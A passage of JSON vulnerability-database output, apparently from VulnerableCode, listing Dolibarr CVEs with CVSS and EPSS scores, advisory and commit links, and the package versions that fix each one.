"value":"0.00197","scoring_system":"epss","scoring_elements":"0.41558","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00197","scoring_system":"epss","scoring_elements":"0.41723","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-11825"},{"reference_url":"https://fatihhcelik.blogspot.com/2020/04/dolibarr-csrf.html","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://fatihhcelik.blogspot.com/2020/04/dolibarr-csrf.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11825","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11825"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/458662?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.7"}],"aliases":["CVE-2020-11825","GHSA-m66x-wm27-xxpc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ufcd-e4r5-ekga"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/207530?format=json","vulnerability_id":"VCID-vxpt-gdg8-r7dc","summary":"SQL Injection in dolibarr","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224","reference_id":"","reference_type":"","scores":[{"value":"0.00515","scoring_system":"epss","scoring_elements":"0.67149","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00515","scoring_system":"epss","scoring_elements":"0.67057","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0224"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/b9b45fb50618aa8053961f50bc8604b188d0ea79"},{"reference_url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486","reference_id":"","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/f1d1ce3e-ca92-4c7b-b1b8-934e28eaa486"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224","reference_id":"CVE-2022-0224","reference_type":"","scores":[{"value":"8.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0224"},{"reference_url":"https://github.com/advisories/GHSA-j545-frh3-r9gq","reference_id":"GHSA-j545-frh3-r9gq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-j545-frh3-r9gq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18669?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"}],"aliases":["CVE-2022-0224","GHSA-j545-frh3-r9gq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vxpt-gdg8-r7dc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/133835?format=json","vulnerability_id":"VCID-wtcs-fcvg-dkgm","summary":"Cross-site Scripting (XSS) - Stored in GitHub repository dolibarr/dolibarr prior to 16.0.5.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30673","published_at":"2026-06-12T12:55:00Z"},{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30477","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-5842"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-5842"},{"reference_url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3","reference_id":"aed81114-5952-46f5-ae3a-e66518e98ba3","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://huntr.com/bounties/aed81114-5952-46f5-ae3a-e66518e98ba3"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c","reference_id":"f569048eb2bd823525bce4ef52316e7a83e3345c","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T17:50:34Z/"}],"url":"https://github.com/dolibarr/dolibarr/commit/f569048eb2bd823525bce4ef52316e7a83e3345c"},{"reference_url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49","reference_id":"GHSA-9pjf-jw9q-fx49","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9pjf-jw9q-fx49"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379062?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.5"}],"aliases":["CVE-2023-5842","GHSA-9pjf-jw9q-fx49"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wtcs-fcvg-dkgm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/337020?format=json","vulnerability_id":"VCID-ww61-hqb4-m3db","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"0.00415","scoring_system":"epss","scoring_elements":"0.62104","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00415","scoring_system":"epss","scoring_elements":"0.62205","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25955"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/796b2d201acb9938b903fb2afa297db289ecc93e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25955"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955","reference_id":"","reference_type":"","scores":[{"value":"9.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25955"},{"reference_url":"https://github.com/advisories/GHSA-cpv8-6xgr-rmf6","reference_id":"GHSA-cpv8-6xgr-rmf6","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cpv8-6xgr-rmf6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/391503?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/19977?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25955","GHSA-cpv8-6xgr-rmf6"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ww61-hqb4-m3db"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/321293?format=json","vulnerability_id":"VCID-xn1w-ekmd-gkd3","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-11823","reference_id":"","reference_type":"","scores":[{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54856","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00313","scoring_system":"epss","scoring_elements":"0.54978","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-11823"},{"reference_url":"https://fatihhcelik.blogspot.com/2020/04/dolibarr-stored-xss.html","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://fatihhcelik.blogspot.com/2020/04/dolibarr-stored-xss.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11823","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11823"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/458662?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.7"}],"aliases":["CVE-2020-11823","GHSA-q938-82fw-wfcf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xn1w-ekmd-gkd3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/331179?format=json","vulnerability_id":"VCID-yvn7-b7wf-7yg2","summary":"","references":[{"reference_url":"http://packetstormsecurity.com/files/163541/Dolibarr-ERP-CRM-10.0.6-Login-Brute-Forcer.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://packetstormsecurity.com/files/163541/Dolibarr-ERP-CRM-10.0.6-Login-Brute-Forcer.html"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-7995","reference_id":"","reference_type":"","scores":[{"value":"0.00636","scoring_system":"epss","scoring_elements":"0.70939","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00636","scoring_system":"epss","scoring_elements":"0.71029","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-7995"},{"reference_url":"https://github.com/tufangungor/tufangungor.github.io/blob/master/_posts/2020-01-19-dolibarr-10.0.6-brute-force.md","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/tufangungor/tufangungor.github.io/blob/master/_posts/2020-01-19-dolibarr-10.0.6-brute-force.md"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7995","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-7995"},{"reference_url":"https://tufangungor.github.io/exploit/2020/01/18/dolibarr-10.0.6-brute-force.html","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://tufangungor.github.io/exploit/2020/01/18/dolibarr-10.0.6-brute-force.html"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/458662?format=json","purl":"pkg:composer/dolibarr/dolibarr@10.0.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.7"}],"aliases":["CVE-2020-7995","GHSA-m5c3-3gvf-q8j5"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-yvn7-b7wf-7yg2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/162859?format=json","vulnerability_id":"VCID-zwts-bt1w-p7a4","summary":"Dolibarr Open Source ERP & CRM for Business before v14.0.1 allows attackers to escalate privileges via a crafted API.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55927","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55806","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-43138"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d"},{"reference_url":"https://www.exploit-db.com/exploits/50248","reference_id":"50248","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2025-04-30T14:07:50Z/"}],"url":"https://www.exploit-db.com/exploits/50248"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-43138","reference_id":"CVE-2022-43138","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/